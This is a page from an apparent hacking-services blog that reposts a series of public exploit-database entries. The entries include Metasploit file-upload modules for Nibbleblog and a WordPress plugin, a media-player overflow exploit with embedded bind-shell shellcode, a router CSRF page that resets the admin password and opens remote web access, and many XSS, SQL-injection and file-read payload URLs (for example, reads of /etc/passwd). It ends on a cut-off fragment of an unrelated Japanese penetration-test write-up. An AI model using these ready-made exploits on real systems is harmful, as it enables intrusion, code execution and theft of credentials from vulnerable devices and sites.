Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863530222

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Vantage Point Security Advisory 2015-003
========================================

Title: Multiple Remote Code Execution found in ZHONE
Vendor: Zhone
Vendor URL: http://www.zhone.com
Device Model: ZHONE ZNID GPON 2426A
(24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models)
Versions affected: < S3.0.501
Severity: High
Vendor notified: Yes
Reported:
Public release:
Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com>

Paper: https://www.exploit-db.com/docs/english/39658-exploiting-buffer-overflows-on-mips-architecture.pdf

Summary:
--------

ZHONE RGW is vulnerable to stack-based buffer overflow attacks due to
the use of unsafe string functions without sufficient input validation
in the httpd binary. Two exploitable conditions were discovered when
requesting a large (7000) character filename ending in .cgi, .tst,
.html, .cmd, .conf, .txt and .wl, in GET or POST requests. Vantage
Point has developed working code execution exploits for these issues.


1. Stack Overflow via HTTP GET Request
---------------------------------------------------------------------------------------

GET /.cmd?AAAA…..AAAA<7000 Characters> HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0)
Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/zhnvlanadd.html
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Connection: keep-alive

2. Stack Overflow via HTTP POST Request
---------------------------------------------------------------------------------------

POST /.cgi HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/updatesettings.html
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Content-Length: 88438

AAAA…..AAAA<7000 Characters>


Fix Information:
----------------

Upgrade to version S3.1.241


Timeline:
---------
2015/04: Issues reported to Zhone
2015/06: Requested Update
2015/08: Requested Update
2015/09: Requested Update
2015/10: Confirm that all issues has been fixed


About Vantage Point Security:
--------------------

Vantage Point is the leading provider for penetration testing and
security advisory services in Singapore. Clients in the Financial,
Banking and Telecommunications industries select Vantage Point
Security based on technical competency and a proven track record to
deliver significant and measurable improvements in their security
posture.

https://www.vantagepoint.sg/
office[at]vantagepoint[dot]sg
HireHackking 
source: https://www.securityfocus.com/bid/59371/info

The Colormix theme for WordPress is prone to multiple security vulnerabilities, including:

1. A cross-site scripting vulnerability
2. A path-disclosure vulnerability
3. Multiple content-spoofing vulnerabilities

An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. 

Content spoofing:

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?config=1.xml

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://www.example1.com

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF

Cross-site scripting:

http://www.example.com/wp-content/themes/colormix/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
HireHackking 
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'Nibbleblog File Upload Vulnerability',
      'Description'     => %q{
          Nibbleblog contains a flaw that allows a authenticated remote
          attacker to execute arbitrary PHP code. This module was
          tested on version 4.0.3.
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Unknown', # Vulnerability Disclosure - Curesec Research Team. Author's name?
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'References'      =>
        [
          ['URL', 'http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html']
        ],
      'DisclosureDate'  => 'Sep 01 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['Nibbleblog 4.0.3', {}]],
      'DefaultTarget'   => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI',  [true, 'The base path to the web application', '/']),
        OptString.new('USERNAME',   [true, 'The username to authenticate with']),
        OptString.new('PASSWORD',   [true, 'The password to authenticate with'])
      ], self.class)
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def check
    cookie = do_login(username, password)
    return Exploit::CheckCode::Detected unless cookie

    res = send_request_cgi(
      'method'      => 'GET',
      'uri'         => normalize_uri(target_uri.path, 'admin.php'),
      'cookie'      => cookie,
      'vars_get'    => {
        'controller'  => 'settings',
        'action'      => 'general'
      }
    )

    if res && res.code == 200 && res.body.include?('Nibbleblog 4.0.3 "Coffee"')
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Safe
  end

  def do_login(user, pass)
    res = send_request_cgi(
      'method'      => 'GET',
      'uri'         => normalize_uri(target_uri.path, 'admin.php')
    )

    fail_with(Failure::Unreachable, 'No response received from the target.') unless res

    session_cookie = res.get_cookies
    vprint_status("#{peer} - Logging in...")
    res = send_request_cgi(
      'method'      => 'POST',
      'uri'         => normalize_uri(target_uri.path, 'admin.php'),
      'cookie'      => session_cookie,
      'vars_post'   => {
        'username'  => user,
        'password'  => pass
      }
    )

    return session_cookie if res && res.code == 302 && res.headers['Location']
    nil
  end

  def exploit
    unless [ Exploit::CheckCode::Detected, Exploit::CheckCode::Appears ].include?(check)
      print_error("Target does not appear to be vulnerable.")
      return
    end

    vprint_status("#{peer} - Authenticating using #{username}:#{password}")

    cookie = do_login(username, password)
    fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
    vprint_good("#{peer} - Authenticated with Nibbleblog.")

    vprint_status("#{peer} - Preparing payload...")
    payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php"

    data = Rex::MIME::Message.new
    data.add_part('my_image', nil, nil, 'form-data; name="plugin"')
    data.add_part('My image', nil, nil, 'form-data; name="title"')
    data.add_part('4', nil, nil, 'form-data; name="position"')
    data.add_part('', nil, nil, 'form-data; name="caption"')
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"image\"; filename=\"#{payload_name}\"")
    data.add_part('1', nil, nil, 'form-data; name="image_resize"')
    data.add_part('230', nil, nil, 'form-data; name="image_width"')
    data.add_part('200', nil, nil, 'form-data; name="image_height"')
    data.add_part('auto', nil, nil, 'form-data; name="image_option"')
    post_data = data.to_s

    vprint_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'method'        => 'POST',
      'uri'           => normalize_uri(target_uri, 'admin.php'),
      'vars_get'      => {
        'controller'  => 'plugins',
        'action'      => 'config',
        'plugin'      => 'my_image'
      },
      'ctype'         => "multipart/form-data; boundary=#{data.bound}",
      'data'          => post_data,
      'cookie'        => cookie
    )

    if res && /Call to a member function getChild\(\) on a non\-object/ === res.body
      fail_with(Failure::Unknown, 'Unable to upload payload. Does the server have the My Image plugin installed?')
    elsif res && !( res.body.include?('<b>Warning</b>') || res.body.include?('warn') )
      fail_with(Failure::Unknown, 'Unable to upload payload.')
    end

    vprint_good("#{peer} - Uploaded the payload.")

    php_fname = 'image.php'
    payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname)
    vprint_status("#{peer} - Parsed response.")

    register_files_for_cleanup(php_fname)
    vprint_status("#{peer} - Executing the payload at #{payload_url}.")
    send_request_cgi(
      'uri'     => payload_url,
      'method'  => 'GET'
    )
  end
end
HireHackking 
#!/usr/bin/python

#####################################################################
# Exploit Title: Tomabo MP4 Player 3.11.6 SEH Based Stack Overflow  #
# Exploit Author: @yokoacc, @nudragn, @rungga_reksya                #
# Vendor Homepage: http://www.tomabo.com/                           #
# Software Link: http://www.tomabo.com/mp4-player/download.html     #
# Vulnerable App: Attached                                          #
# Version: 3.11.6 (possibility <= 3.11.6)                           #
# Tested on: Windows XP, 7, 8, and 8.1                              #
# Special Thanks to: @OffsecTraining                                #
# Vendor Notification: August 30th, 2015                            #
# Fixed Date: Around September 16th, 2015 (didn't response yet)     #
# Public Disclosure: October 18th, 2015                             #
#####################################################################

# How to: Run the code and open the m3u file with the Vulnerable MP4 Player by Tomabo
# Bad Character = '\x00\x09\x0a\x0b\x0c\x0d\x1a\x20'
# Payload= windows/meterpreter/bind_tcp ; PORT=4444

file ="whatever.m3u"

load = "\x41" * 1028
load += "\xeb\x08\x90\x90"
load += "\xA9\x1C\x40\x00"
load += "\x90" * 16
load += ("\xdb\xde\xbd\xbc\x9e\x98\xd8\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x48\x31\x6f\x18\x03\x6f\x18\x83\xef\x40\x7c\x6d\x24\x50\x03"
"\x8e\xd5\xa0\x64\x06\x30\x91\xa4\x7c\x30\x81\x14\xf6\x14\x2d"
"\xde\x5a\x8d\xa6\x92\x72\xa2\x0f\x18\xa5\x8d\x90\x31\x95\x8c"
"\x12\x48\xca\x6e\x2b\x83\x1f\x6e\x6c\xfe\xd2\x22\x25\x74\x40"
"\xd3\x42\xc0\x59\x58\x18\xc4\xd9\xbd\xe8\xe7\xc8\x13\x63\xbe"
"\xca\x92\xa0\xca\x42\x8d\xa5\xf7\x1d\x26\x1d\x83\x9f\xee\x6c"
"\x6c\x33\xcf\x41\x9f\x4d\x17\x65\x40\x38\x61\x96\xfd\x3b\xb6"
"\xe5\xd9\xce\x2d\x4d\xa9\x69\x8a\x6c\x7e\xef\x59\x62\xcb\x7b"
"\x05\x66\xca\xa8\x3d\x92\x47\x4f\x92\x13\x13\x74\x36\x78\xc7"
"\x15\x6f\x24\xa6\x2a\x6f\x87\x17\x8f\xfb\x25\x43\xa2\xa1\x21"
"\xa0\x8f\x59\xb1\xae\x98\x2a\x83\x71\x33\xa5\xaf\xfa\x9d\x32"
"\xd0\xd0\x5a\xac\x2f\xdb\x9a\xe4\xeb\x8f\xca\x9e\xda\xaf\x80"
"\x5e\xe3\x65\x3c\x57\x42\xd6\x23\x9a\x34\x86\xe3\x35\xdc\xcc"
"\xeb\x6a\xfc\xee\x21\x03\x94\x12\xca\x3d\x38\x9a\x2c\x57\xd0"
"\xca\xe7\xc0\x12\x29\x30\x76\x6d\x1b\x68\x10\x26\x4d\xaf\x1f"
"\xb7\x5b\x87\xb7\x33\x88\x13\xa9\x44\x85\x33\xbe\xd2\x53\xd2"
"\x8d\x43\x63\xff\x64\x83\xf1\x04\x2f\xd4\x6d\x07\x16\x12\x32"
"\xf8\x7d\x29\xfb\x6c\x3e\x45\x04\x61\xbe\x95\x52\xeb\xbe\xfd"
"\x02\x4f\xed\x18\x4d\x5a\x81\xb1\xd8\x65\xf0\x66\x4a\x0e\xfe"
"\x51\xbc\x91\x01\xb4\x3c\xed\xd7\xf0\x4a\x1f\xe4")

load += "\x44" * (1800 - len(load))

writeFile = open (file, "w")
writeFile.write(load)
writeFile.close()
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=547

If IExternalizable.writeExternal is overridden with a value that is not a function, Flash assumes it is a function even though it is not one. This leads to execution of a 'method' outside of the ActionScript object's ActionScript vtable, leading to memory corruption.

A sample swf is attached. ActionScript code is also attached, but it does not compile to the needed to swf. To get the PoC, decompress the swf using flasm -x myswf, and then search for "triteExternal" and change it to "writeExternal".

This bug is in the AVM serializer (http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/AvmSerializer.cpp), and is type confusion when calling the method writeExternal, which is implemented when a class extends IExternalizable (http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/IExternalizable.html). The method is resolved on line 1437 of AvmSerializer.cpp by calling toplevel->getBinding, which does not guarantee that the binding is a method binding. It then gets cast to a method on line 773 and called, which is type confusion.

One challenge with the bug is actually creating a SWF which can hit this code, as usually overriding a defined method will lead to an illegal override exception. The 0-day author did this differently than I did. The code where all class properties (methods, internal classes, variables, etc.) are resolved is in http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/Traits.cpp. You can see on line 813 that a check that no two properties of a class have the same name is commented out due to some legitimate SWFs doing that. This means that a SWF can have a variable with the same name as a method (overriding a method with less restrictive method is still illegal), which is how my PoC overrode the method. The 0-day did something slightly different, it put the redefinition of writeExternal in a different public namespace than the original definition of writeExternal. This has the benefit that the ActionScript will compile and hit the bug without modification. 

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38490.zip
HireHackking 
# Title: Path Traversal Vulnerability
# Product: Belkin Router N150
# Author: Rahul Pratap Singh
# Website: https://0x62626262.wordpress.com
# Contact:
   Linkedin: https://in.linkedin.com/in/rahulpratapsingh94
   Twitter: @0x62626262
# Vendor Homepage: http://www.belkin.com
# Firmware Tested: 1.00.08, 1.00.09
# CVE: 2014-2962

Description:
Belkin N150 wireless router firmware versions 1.00.07 and earlier contain a
path traversal vulnerability through the built-in web interface. The
webproc cgi
module accepts a getpage parameter which takes an unrestricted file path as
input. The web server runs with root privileges by default, allowing a
malicious attacker to read any file on the system.

A patch was released by Belkin but that is still vulnerable.

POC:
http://192.168.2.1/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
#root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh

Ref:
https://www.kb.cert.org/vuls/id/774788
https://0x62626262.wordpress.com/category/full-disclosure/
HireHackking 
# Exploit Title: VLC | libvlccore - (.mp3) Stack Overflow
# Date: 18/10/2015
# Exploit Author: Andrea Sindoni
# Software Link: https://www.videolan.org/vlc/index.it.html
# Version: 2.2.1
# Tested on: Windows 7 Professional 64 bits
#
# PoC with MP3: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38485.zip
#

#APP:  vlc.exe
#ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) amd64fre
#FOLLOWUP_NAME:  MachineOwner
#MODULE_NAME: libvlccore
#IMAGE_NAME:  libvlccore.dll
#FAILURE_ID_HASH_STRING:  um:wrong_symbols_c00000fd_libvlccore.dll!vlm_messageadd
#Exception Hash (Major/Minor): 0x60346a4d.0x4e342e62
#EXCEPTION_RECORD:  ffffffffffffffff -- (.exr 0xffffffffffffffff)
#ExceptionAddress: 00000000749ba933 (libvlccore!vlm_MessageAdd+0x00000000000910d3)
#  ExceptionCode: c00000fd (Stack overflow)
#  ExceptionFlags: 00000000
#NumberParameters: 2
#   Parameter[0]: 0000000000000001
#   Parameter[1]: 0000000025ed2a20
#
#eax=00436f00 ebx=2fdc0100 ecx=25ed2a20 edx=00632efa esi=17fb2fdc edi=00000001
#eip=749ba933 esp=260cfa14 ebp=260cfa78 iopl=0         nv up ei pl nz na po nc
#cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
#
#Stack Overflow starting at libvlccore!vlm_MessageAdd+0x00000000000910d3 (Hash=0x60346a4d.0x4e342e62)
#

import eyed3

value = u'B'*6500000

audiofile = eyed3.load("base.mp3")
audiofile.tag.artist = value
audiofile.tag.album = u'andrea'
audiofile.tag.album_artist = u'sindoni'

audiofile.tag.save()
HireHackking 
source: https://www.securityfocus.com/bid/59322/info

Crafty Syntax Live Help is prone to a remote file-include vulnerability and a path-disclosure vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting these issues could allow an attacker to obtain sensitive information and compromise the application and the underlying system; other attacks are also possible.

Crafty Syntax Live Help versions 2.x and versions 3.x are vulnerable. 

File-include:

http://www.example.com/path/admin.php?page=[RFI]

Path-disclosure:

http://www.example.com/livehelp/xmlhttp.php
HireHackking 
source: https://www.securityfocus.com/bid/59312/info

D-Link DIR-865L is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible.

D-Link DIR-865L firmware version 1.03 is vulnerable; other versions may also be affected. 

<html> <head> <title> D-LINK DIR-865L CSRF</title> <!-- Firmware Version: 1.03 Fri 02 Nov 2012 --> </head> <body> <form name="dlinkXML" action="http://192.168.0.1/hedwig.cgi" enctype="text/plain" method="post"> <input type="hidden" name="<?xml version" value="'1.0' encoding='UTF-8'?> <postxml> <module> <service>DEVICE.ACCOUNT</service> <device> <gw_name>DIR-865L</gw_name> <account> <seqno>1</seqno> <max>2</max> <count>1</count> <entry> <uid>USR-</uid> <name>Admin</name> <usrid/> <password>ISE</password> <group>0</group> <description/> </entry> </account> <group> <seqno/> <max/> <count>0</count> </group> <session> <captcha>0</captcha> <dummy/> <timeout>600</timeout> <maxsession>128</maxsession> <maxauthorized>16</maxauthorized> </session> </device> </module> <module> <service>HTTP.WAN-1</service> <inf> <web>1337</web> <https_rport></https_rport> <stunnel>1</stunnel> <weballow> <hostv4ip/> </weballow> <inbfilter></inbfilter> </inf> </module> <module> <service>HTTP.WAN-2</service> <inf> <web>1337</web> <weballow></weballow> </inf> </module> <module> <service>INBFILTER</service> <acl> <inbfilter> <seqno>1</seqno> <max>24</max> <count>0</count> </inbfilter> </acl> <ACTIVATE>ignore</ACTIVATE> <FATLADY>ignore</FATLADY> <SETCFG>ignore</SETCFG> </module> <module> <service>SHAREPORT</service> <FATLADY>ignore</FATLADY> <ACTIVATE>ignore</ACTIVATE> </module> </postxml>"> </form> <script> function CSRF1() {document.dlinkXML.submit();};window.setTimeout(CSRF1,1000) function CSRF2() {window.open("http://192.168.0.100/dlinkCSRF2.html");}; window.setTimeout(CSRF2,1000) </script> </body> </html>
HireHackking 
source: https://www.securityfocus.com/bid/59325/info

TP-LINK TL-WR741N and TL-WR741ND routers are prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests.

Successful exploits will cause the device to crash, denying service to legitimate users. 

GET http://www.example.com:80/userRpm/DdnsAddRpm.htm?provider=4 HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://www.example.com/userRpm/DdnsAddRpm.htm?provider=4
Authorization: Basic YWRtaW46YWRtaW4=



GET http://www.example.com:80/help/../../root HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://www.example.com/help/
HireHackking 
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
  
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Plugin ajax-load-more Authenticated Arbitrary File Upload',
      'Description'     => %q{
          This module exploits an authenticated file upload vulnerability in Wordpress plugin
ajax-load-more versions < 2.8.2. Valid wordpress credentials are required for the exploit to work.
          Tested with version v2.7.3. (May work on older versions).
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Pizza Hat Hacker <PizzaHatHacker[A]gmail[.]com', # Vulnerability discovery & Metasploit module
        ],
      'References'      =>
        [
          ['WPVDB', '8209']
        ],
      'DisclosureDate'  => 'Oct 02 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['ajax-load-more', {}]],
      'DefaultTarget'   => 0
    ))
	
	register_options(
    [
         OptString.new('WP_USER', [true, 'A valid wordpress username', nil]),
         OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
    ], self.class)
  end
  
  def user
    datastore['WP_USER']
  end
  
  def password
    datastore['WP_PASSWORD']
  end
  
  def check
    # Check plugin version
	ver = check_plugin_version_from_readme('ajax-load-more, 2.8.2')
	if ver
	  return Exploit::CheckCode::Appears
	end
	return Exploit::CheckCode::Safe
  end
  
  def exploit
    # Wordpress login
    print_status("#{peer} - Trying to login as #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as #{user}")
      return
    end
    
    url = normalize_uri(wordpress_url_backend, 'profile.php')
    print_status("#{peer} - Retrieving WP nonce from #{url}")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => url,
      'cookie'   => cookie
    })
    
    if res and res.code == 200
      # "alm_admin_nonce":"e58b6d536d"
      res.body =~ /\"alm_admin_nonce\":\"([0-9a-f]+)\"/
      wp_nonce = $1
      if wp_nonce
        print_good("#{peer} Found ajax-load-more wp_nonce value : #{wp_nonce}")
      else
        vprint_error("#{peer} #{res.body}")
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve wp_nonce from user profile page.")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Unexpected server response (code #{res.code}) while accessing user profile page.")
    end

    print_status("#{peer} - Trying to upload payload")
    
    # Generate MIME message
    data = Rex::MIME::Message.new
    data.add_part('alm_save_repeater', nil, nil, 'form-data; name="action"')
    data.add_part(wp_nonce, nil, nil, 'form-data; name="nonce"')
    data.add_part('default', nil, nil, 'form-data; name="type"')
    data.add_part("#{rand_text_alpha_lower(3)}", nil, nil, 'form-data; name="repeater"')
    data.add_part(payload.encoded, nil, nil, 'form-data; name="value"')

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_admin_ajax),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s,
      'cookie'   => cookie
    })
    
    filename = 'default.php'
    if res
      if res.code == 200
        lines = res.body.split("\n")
        if lines.length > 0
          message = lines[lines.length - 1]
          if message.include?('Template Saved Successfully')
            register_files_for_cleanup(filename)
          else
            vprint_error("#{peer} - Unexpected web page content : #{message}")
          end
        else
          fail_with(Failure::Unknown, "#{peer} - Unexpected empty server response")
        end
      else
        fail_with(Failure::Unknown, "#{peer} - Unexpected HTTP response code : #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
    
    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end
HireHackking 
source: https://www.securityfocus.com/bid/59298/info

Fork CMS is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. 

http://www.example.com/frontend/js.php?module=core&file=../../../../../../../../../../../../../../../../etc/passwd&language=en&m=1339527371
HireHackking 
source: https://www.securityfocus.com/bid/59290/info

Matrix42 Service Store is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Service Store 5.3 SP3 (5.33.946.0) is vulnerable; other versions may also be affected. 

https://www.example.com/SPS/Portal/default.aspx?'"--></style></script> 
<script>alert(document.cookie)</script> [XSS]
HireHackking 
source: https://www.securityfocus.com/bid/59278/info

Sosci Survey is prone to following security vulnerabilities:

1. An unauthorized-access vulnerability
2. Multiple cross-site scripting vulnerabilities
3. Multiple HTML-injection vulnerabilities
4. A PHP code-execution vulnerability

Successful exploits may allow an attacker to gain unauthorized access to the affected application, allow attacker-supplied HTML and script code to run in the context of the affected browser, allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or inject and execute arbitrary malicious PHP code in the context of the web server process. 

https://www.example.com/admin/index.php?o=account&a=message.reply&id=[msg_id]
https://www.example.com/admin/index.php?o=panel&a=receiver.edit&id=<script>alert(document.cookie)</script>
HireHackking 
source: https://www.securityfocus.com/bid/59069/info
 
Todoo Forum is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
 
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
Todoo Forum 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=[Inject_here]&pg=1
http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=1&pg=[Inject_Here]
HireHackking 
source: https://www.securityfocus.com/bid/59069/info

Todoo Forum is prone to multiple SQL-injection and cross-site scripting vulnerabilities.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Todoo Forum 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post='"--></style></script><script>alert(0x0000)</script>&pg=1
http://www.example.com/todooforum/todooforum.php?cat=reponse&id_forum=0&id_post=2&pg='"--></style></script><script>alert(0x0000)</script>
HireHackking 
source: https://www.securityfocus.com/bid/59054/info

Cisco Linksys EA2700 routers is prone to the following security vulnerabilities:

1. A security-bypass vulnerability
2. A cross-site request-forgery vulnerability
3. A cross-site scripting vulnerability

An attacker can exploit these issues to bypass certain security restrictions, steal cookie-based authentication credentials, gain access to system and other configuration files, or perform unauthorized actions in the context of a user session.

Cisco Linksys EA2700 running firmware 1.0.12.128947 is vulnerable. 

The following example request is available:

POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

submit_button=xss'%3balert(1)//934&action=Apply
HireHackking 
source: https://www.securityfocus.com/bid/59021/info

Spider Video Player plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Spider Video Player 2.1 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
HireHackking 
source: https://www.securityfocus.com/bid/59030/info

jPlayer is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/Jplayer.swf?id=%3Cimg%20src=x%20onerror=alert\u0028\u0027moin\u0027\u0029%3E&jQuery=document.write
HireHackking 
source: https://www.securityfocus.com/bid/59022/info

Request Tracker is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

RT 4.0.10 is vulnerable; other versions may also be affected. 

POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.example.com/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; 
Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 
3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120

ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=
HireHackking 
source: https://www.securityfocus.com/bid/59041/info

Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Hero 3.791 is vulnerable; other versions may also be affected. 

http://www.example.com/users/login?username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/59041/info
 
Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
 
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
Hero 3.791 is vulnerable; other versions may also be affected. 

http://www.example.com/users/forgot_password?error=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==
HireHackking

0x00情報収集

は、ターゲット名(一部の病院)と1つのIPのみが1つの緊急テストタスクを受けました。

まず、Goby Shuttleを使用して、取得したIPをフルポートでスキャンします。

